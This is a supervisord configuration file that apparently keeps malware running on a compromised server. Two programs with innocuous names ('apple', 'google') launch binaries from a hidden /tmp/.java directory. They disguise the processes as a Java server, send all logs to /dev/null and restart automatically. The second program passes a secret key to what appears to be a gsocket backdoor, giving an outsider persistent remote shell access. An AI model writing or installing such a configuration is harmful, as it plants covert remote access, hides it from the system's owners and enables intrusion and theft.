[supervisord]
logfile=/dev/null

[program:apple]
directory=/usr/local/bin
environment=PORT="8084"
command=/tmp/.java/bin/uid ~~m ~~n 'java -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ~~f /tmp/.java/bin/.a/java
stdout_logfile=/dev/null
autorestart = true

[program:google]
directory=/usr/local/bin
environment=GSOCKET_ARGS="-s i0AE7D1X9g-8H6bX1eCd9F9440-i0J6d6A2c5J1g6-K7J0x5m1r3K4s -liq"
command=/tmp/.java/bin/uid ~~m ~~n 'java -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ~~f /tmp/.java/bin/.c/java
stdout_logfile=/dev/null
autorestart = true